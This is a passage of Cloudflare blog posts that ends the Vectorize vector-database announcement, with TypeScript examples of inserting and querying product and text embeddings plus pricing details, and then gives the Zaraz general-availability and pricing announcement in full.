Each vector represents a product across our store, and we associate the URL of the product with it. We could also set the ID of each vector to the product ID: both approaches are valid. Our query — vector search — represents the product description and content for the product user is currently viewing.

Let’s step through what this looks like in code: this example is pulled straight from our developer documentation:

export interface Env {
	// This makes our vector index methods available on env.MY_VECTOR_INDEX.*
	// e.g. env.MY_VECTOR_INDEX.insert() or .query()
	TUTORIAL_INDEX: VectorizeIndex;

// Sample vectors: 3 dimensions wide.
// Vectors from a machine-learning model are typically ~100 to 1536 dimensions
// wide (or wider still).
const sampleVectors: Array<VectorizeVector> = [
	{ id: '1', values: [32.4, 74.1, 3.2], metadata: { url: '/products/sku/13913913' } },
	{ id: '2', values: [15.1, 19.2, 15.8], metadata: { url: '/products/sku/10148191' } },
	{ id: '3', values: [0.16, 1.2, 3.8], metadata: { url: '/products/sku/97913813' } },
	{ id: '4', values: [75.1, 67.1, 29.9], metadata: { url: '/products/sku/418313' } },
	{ id: '5', values: [58.8, 6.7, 3.4], metadata: { url: '/products/sku/55519183' } },

export default {
	async fetch(request: Request, env: Env, ctx: ExecutionContext): Promise<Response> {
		if (new URL(request.url).pathname !== '/') {
			return new Response('', { status: 404 });
		// Insert some sample vectors into our index
		// In a real application, these vectors would be the output of a machine learning (ML) model,
		// such as Workers AI, OpenAI, or Cohere.
		let inserted = await env.TUTORIAL_INDEX.insert(sampleVectors);

		// Log the number of IDs we successfully inserted
		console.info(`inserted ${inserted.count} vectors into the index`);

		// In a real application, we would take a user query - e.g. "durable
		// objects" - and transform it into a vector emebedding first.
		// In our example, we're going to construct a simple vector that should
		// match vector id #5
		let queryVector: Array<number> = [54.8, 5.5, 3.1];

		// Query our index and return the three (topK = 3) most similar vector
		// IDs with their similarity score.
		// By default, vector values are not returned, as in many cases the
		// vectorId and scores are sufficient to map the vector back to the
		// original content it represents.
		let matches = await env.TUTORIAL_INDEX.query(queryVector, { topK: 3, returnVectors: true });

		// We map over our results to find the most similar vector result.
		// Since our index uses the 'cosine' distance metric, scores will range
		// from 1 to -1.  A value of '1' means the vector is the same; the
		// closer to 1, the more similar. Values of -1 (least similar) and 0 (no
		// match).
		// let closestScore = 0;
		// let mostSimilarId = '';
		// matches.matches.map((match) => {
		// 	if (match.score > closestScore) {
		// 		closestScore = match.score;
		// 		mostSimilarId = match.vectorId;
		// 	}
		// });

		return Response.json({
			// This will return the closest vectors: we'll see that the vector
			// with id = 5 has the highest score (closest to 1.0) as the
			// distance between it and our query vector is the smallest.
			// Return the full set of matches so we can see the possible scores.
			matches: matches,

The code above is intentionally simple, but illustrates vector search at its core: we insert vectors into our database, and query it for vectors with the smallest distance to our query vector.

Here are the results, with the values included, so we visually observe that our query vector [54.8, 5.5, 3.1] is similar to our highest scoring match: [58.799, 6.699, 3.400] returned from our search. This index uses cosine similarity to calculate the distance between vectors, which means that the closer the score to 1, the more similar a match is to our query vector.

  "matches": {
    "count": 3,
    "matches": [
        "score": 0.999909,
        "vectorId": "5",
        "vector": {
          "id": "5",
          "values": [
          "metadata": {
            "url": "/products/sku/55519183"
        "score": 0.789848,
        "vectorId": "4",
        "vector": {
          "id": "4",
          "values": [
          "metadata": {
            "url": "/products/sku/418313"
        "score": 0.611976,
        "vectorId": "2",
        "vector": {
          "id": "2",
          "values": [
          "metadata": {
            "url": "/products/sku/10148191"

In a real application, we could now quickly return product recommendation URLs based on the most similar products, sorting them by their score (highest to lowest), and increasing the topK value if we want to show more. The metadata stored alongside each vector could also embed a path to an R2 object, a UUID for a row in a D1 database, or a key-value pair from Workers KV.

Workers AI + Vectorize: full stack vector search on Cloudflare

In a real application, we need a machine learning model that can both generate vector embeddings from our original dataset (to seed our database) and quickly turn user queries into vector embeddings too. These need to be from the same model, as each model represents features differently.

Here’s a compact example building an entire end-to-end vector search pipeline on Cloudflare:

import { Ai } from '@cloudflare/ai';
export interface Env {
	TEXT_EMBEDDINGS: VectorizeIndex;
	AI: any;
interface EmbeddingResponse {
	shape: number[];
	data: number[][];

export default {
	async fetch(request: Request, env: Env, ctx: ExecutionContext): Promise<Response> {
		const ai = new Ai(env.AI);
		let path = new URL(request.url).pathname;
		if (path.startsWith('/favicon')) {
			return new Response('', { status: 404 });

		// We only need to generate vector embeddings just the once (or as our
		// data changes), not on every request
		if (path === '/insert') {
			// In a real-world application, we could read in content from R2 or
			// a SQL database (like D1) and pass it to Workers AI
			const stories = ['This is a story about an orange cloud', 'This is a story about a llama', 'This is a story about a hugging emoji'];
			const modelResp: EmbeddingResponse = await ai.run('@cf/baai/bge-base-en-v1.5', {
				text: stories,

			// We need to convert the vector embeddings into a format Vectorize can accept.
			// Each vector needs an id, a value (the vector) and optional metadata.
			// In a real app, our ID would typicaly be bound to the ID of the source
			// document.
			let vectors: VectorizeVector[] = [];
			let id = 1;
			modelResp.data.forEach((vector) => {
				vectors.push({ id: `${id}`, values: vector });

			await env.TEXT_EMBEDDINGS.upsert(vectors);

		// Our query: we expect this to match vector id: 1 in this simple example
		let userQuery = 'orange cloud';
		const queryVector: EmbeddingResponse = await ai.run('@cf/baai/bge-base-en-v1.5', {
			text: [userQuery],

		let matches = await env.TEXT_EMBEDDINGS.query(queryVector.data[0], { topK: 1 });
		return Response.json({
			// We expect vector id: 1 to be our top match with a score of
			// ~0.896888444
			// We are using a cosine distance metric, where the closer to one,
			// the more similar.
			matches: matches,

The code above does four things:

  1. It passes the three sentences to Workers AI’s text embedding model (@cf/baai/bge-base-en-v1.5) and retrieves their vector embeddings.
  2. It inserts those vectors into our Vectorize index.
  3. Takes the user query and transforms it into a vector embedding via the same Workers AI model.
  4. Queries our Vectorize index for matches.

This example might look “too” simple, but in a production application, we’d only have to change two things: just insert our vectors once (or periodically via Cron Triggers), and replace our three example sentences with real data stored in R2, a D1 database, or another storage provider.

In fact, this is incredibly similar to how we run Cursor, the AI assistant that can answer questions about Cloudflare Worker: we migrated Cursor to run on Workers AI and Vectorize. We generate text embeddings from our developer documentation using its built-in text embedding model, insert them into a Vectorize index, and transform user queries on the fly via that same model.

BYO embeddings from your favorite AI API

Vectorize isn’t just limited to Workers AI, though: it’s a fully-fledged, standalone vector database.

If you’re already using OpenAI’s Embedding API, Cohere’s multilingual model, or any other embedding API, then you can easily bring-your-own (BYO) vectors to Vectorize.

It works just the same: generate your embeddings, insert them into Vectorize, and pass your queries through the model before you query your index. Vectorize includes a few shortcuts for some of the most popular embedding models.

# Vectorize has ready-to-go presets that set the dimensions and distance metric for popular embeddings models
$ wrangler vectorize create openai-index-example --preset=openai-text-embedding-ada-002

This can be particularly useful if you already have an existing workflow around an existing embeddings API, and/or have validated a specific multimodal or multilingual embeddings model for your use-case.

Making the cost of AI predictable

There’s a tremendous amount of excitement around AI and ML, but there’s also one big concern: that it’s too expensive to experiment with, and hard to predict at scale.

With Vectorize, we wanted to bring a simpler pricing model to vector databases. Have an idea for a proof-of-concept at work? That should fit into our free-tier limits. Scaling up and optimizing your embedding dimensions for performance vs. accuracy? It shouldn’t break the bank.

Importantly, Vectorize aims to be predictable: you don’t need to estimate CPU and memory consumption, which can be hard when you’re just starting out, and made even harder when trying to plan for your peak vs. off-peak hours in production for a brand new use-case. Instead, you’re charged based on the total number of vector dimensions you store, and the number of queries against them each month. It’s our job to take care of scaling up to meet your query patterns.

Here’s the pricing for Vectorize — and if you have a Workers paid plan now, Vectorize is entirely free to use until 2024:

Workers Free (coming soon) Workers Paid ($5/month)
Queried vector dimensions included 30M total queried dimensions / month 50M total queried dimensions / month
Stored vector dimensions included 5M stored dimensions / month 10M stored dimensions / month
Additional cost $0.04 / 1M vector dimensions queried or stored $0.04 / 1M vector dimensions queried or stored

Pricing is based entirely on what you store and query: (total vector dimensions queried + stored) * dimensions_per_vector * price. Query more? Easy to predict. Optimizing for smaller dimensions per vector to improve speed and reduce overall latency? Cost goes down. Have a few indexes for prototyping or experimenting with new use-cases? We don’t charge per-index.

Vectorize: a vector database for shipping AI-powered applications to production, fast
Create as many as you need indexes to prototype new ideas and/or separate production from dev.

As an example: if you load 10,000 Workers AI vectors (384 dimensions each) and make 5,000 queries against your index each day, it’d result in 49 million total vector dimensions queried and still fit into what we include in the Workers Paid plan ($5/month). Better still: we don’t delete your indexes due to inactivity.

Note that while this pricing isn’t final, we expect few changes going forward. We want to avoid the element of surprise: there’s nothing worse than starting to build on a platform and realizing the pricing is untenable after you’ve invested the time writing code, tests and learning the nuances of a technology.


Every Workers developer on a paid plan can start using Vectorize immediately: the open beta is available right now, and you can visit our developer documentation to get started.

This is also just the beginning of the vector database story for us at Cloudflare. Over the next few weeks and months, we intend to land a new query engine that should further improve query performance, support even larger indexes, introduce sub-index filtering capabilities, increased metadata limits, and per-index analytics.

If you’re looking for inspiration on what to build, see the semantic search tutorial that combines Workers AI and Vectorize for document search, running entirely on Cloudflare. Or an example of how to combine OpenAI and Vectorize to give an LLM more context and dramatically improve the accuracy of its answers.

And if you have questions about how to use Vectorize for our product & engineering teams, or just want to bounce an idea off of other developers building on Workers AI, join the #vectorize and #workers-ai channels on our Developer Discord.

Vectorize: a vector database for shipping AI-powered applications to production, fast

Cloudflare Zaraz steps up: general availability and new pricing

Post Syndicated from Yair Dovrat original http://blog.cloudflare.com/cloudflare-zaraz-steps-up-general-availability-and-new-pricing/

Cloudflare Zaraz steps up: general availability and new pricing

This post is also available in Deutsch, Français.

Cloudflare Zaraz has transitioned out of beta and is now generally available to all customers. It is included under the free, paid, and enterprise plans of the Cloudflare Developer Platform. Visit our docs to learn more on our different plans.

Cloudflare Zaraz steps up: general availability and new pricing

Zaraz Is part of Cloudflare Developer Platform

Cloudflare Zaraz is a solution that developers and marketers use to load third-party tools like Google Analytics 4, Facebook CAPI, TikTok, and others. With Zaraz, Cloudflare customers can easily transition to server-side data collection with just a few clicks, without the need to set up and maintain their own cloud environment or make additional changes to their website for installation. Server-side data collection, as facilitated by Zaraz, simplifies analytics reporting from the server rather than loading numerous JavaScript files on the user's browser. It's a rapidly growing trend due to browser limitations on using third-party solutions and cookies. The result is significantly faster websites, plus enhanced security and privacy on the web.

We've had Zaraz in beta mode for a year and a half now. Throughout this time, we've dedicated our efforts to meeting as many customers as we could, gathering feedback, and getting a deep understanding of our users' needs before addressing them. We've been shipping features at a high rate and have now reached a stage where our product is robust, flexible, and competitive. It also offers unique features not found elsewhere, thanks to being built on Cloudflare’s global network, such as Zaraz’s Worker Variables. We have cultivated a strong and vibrant discord community, and we have certified Zaraz developers ready to help anyone with implementation and configuration.

With more than 25,000 websites running Zaraz today – from personal sites to those of some of the world's biggest companies – we feel confident it's time to go out of beta, and introduce our new pricing system. We believe this pricing is not only generous to our customers, but also competitive and sustainable. We view this as the next logical step in our ongoing commitment to our customers, for whom we're building the future.

If you're building a web application, there's a good chance you've spent at least some time implementing third-party tools for analytics, marketing performance, conversion optimization, A/B testing, customer experience and more. Indeed, according to the Web Almanac report, 94% percent of mobile pages used at least one third-party solution in 2022, and third-party requests accounted for 45% of all requests made by websites. It's clear that third-party solutions are everywhere. They have become an integral part of how the web has evolved. Third-party tools are here to stay, and they require effective developer solutions. We are building Zaraz to help developers manage the third-party layer of their website properly.

Starting today, Cloudflare Zaraz is available to everyone for free under their Cloudflare dashboard, and the paid version of Zaraz is included in the Workers Paid plan. The Free plan is designed to meet the needs of most developers who want to use Zaraz for personal use cases. For a price starting at $5/month, customers of the Workers Paid plan can enjoy the extensive list of features that makes Zaraz powerful, deploy Zaraz on their professional projects, and utilize the pay-as-you-go system. This is in addition to everything else included in the Workers Paid plan. The Enterprise plan, on the other hand, addresses the needs of larger businesses looking to leverage our platform to its fullest potential.

How is Zaraz priced

Zaraz pricing is based on two components: Zaraz Loads and the set of features. A Zaraz Load is counted each time a web page loads the Zaraz script within it, and/or the Pageview trigger is being activated. For Single Page Applications, each URL navigation is counted as a new Zaraz Load. Under the Zaraz Monitoring dashboard, you can find a report showing how many Zaraz Loads your website has generated during a specific time period. Zaraz Loads and features are factored into our billing as follows:

Cloudflare Zaraz steps up: general availability and new pricing

Free plan

The Free Plan has a limit of 100,000 Zaraz Loads per month per account. This should allow almost everyone wanting to use Zaraz for personal use cases, like personal websites or side projects, to do so for free. After 100,000 Zaraz Loads, Zaraz will simply stop functioning.

Following the same logic, the free plan includes everything you need in order to use Zaraz for personal use cases. That includes Auto-injection, Zaraz Debugger, Zaraz Track and Zaraz Set from our Web API, Consent Management Platform (CMP), Data Layer compatibility mode, and many more.

If your websites generate more than 100,000 Zaraz loads combined, you will need to upgrade to the Workers Paid plan to avoid service interruption. If you desire some of the more advanced features, you can upgrade to Workers Paid and get access for only $5/month.

The Workers Paid Plan includes the first 200,000 Zaraz Loads per month per account, free of charge.

If you exceed the free Zaraz Loads allocations, you'll be charged $0.50 for every additional 1,000 Zaraz Loads, but the service will continue to function. (You can set notifications to get notified when you exceed a certain threshold of Zaraz Loads, to keep track of your usage.)

Workers Paid customers can enjoy most of Zaraz robust and existing features, amongst other things, this includes: Zaraz E-commerce from our Web API, Custom Endpoints, Workers Variables, Preview/Publish Workflow, Privacy Features, and more.

If your websites generate Zaraz Loads in the millions, you might want to consider the Workers Enterprise plan. Beyond the free 200,000 Zaraz Loads per month for your account, it offers additional volume discounts based on your Zaraz Loads usage as well as Cloudflare’s professional services.

Enterprise plan

The Workers Enterprise Plan includes the first 200,000 Zaraz Loads per month per account free of charge. Based on your usage volume, Cloudflare’s sales representatives can offer compelling discounts. Get in touch with us here. Workers Enterprise customers enjoy all paid enterprise features.

I already use Zaraz, what should I do?

If you were using Zaraz under the free beta, you have a period of two months to adjust and decide how you want to go about this change. Nothing will change until September 20, 2023. In the meantime we advise you to:

  1. Get more clarity of your Zaraz Loads usage. Visit Monitoring to check how many Zaraz Loads you had in the previous couple of months. If you are worried about generating more than 100,000 Zaraz Loads per month, you might want to consider upgrading to Workers Paid via the plans page, to avoid service interruption. If you generate a big amount of Zaraz Loads, you’d probably want to reach out to your sales representative and get volume discounts. You can leave your details here, and we’ll get back to you.
  2. Check if you are using one of the paid features as listed in the plans page. If you are, then you would need to purchase a Workers Paid subscription, starting at $5/month via the plans page. On September 20, these features will cease to work unless you upgrade.

* Please note, as of now, free plan users won't have access to any paid features. However, if you're already using a paid feature without a Workers Paid subscription, you can continue to use it risk-free until September 20. After this date, you'll need to upgrade to keep using any paid features.

We are here for you

As we make this important transition, we want to extend our sincere gratitude to all our beta users who have provided invaluable feedback and have helped us shape Zaraz into what it is today. We are excited to see Zaraz move beyond its beta stage and look forward to continuing to serve your needs and helping you build better, faster, and more secure web experiences. We know this change comes with adjustments, and we are committed to making the transition as smooth as possible. In the next couple of days, you can expect an email from us, with clear next steps and a way to get advice in case of need. You can always get in touch directly with the Cloudflare Zaraz team on Discord, or the community forum.

Thank you for joining us on this journey and for your ongoing support and trust in Cloudflare Zaraz. Let's continue to build the future of the web together!